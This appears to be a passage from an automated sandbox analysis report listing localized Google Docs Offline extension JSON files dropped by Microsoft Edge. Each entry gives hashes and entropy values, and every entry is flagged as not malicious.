                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                Malicious:false
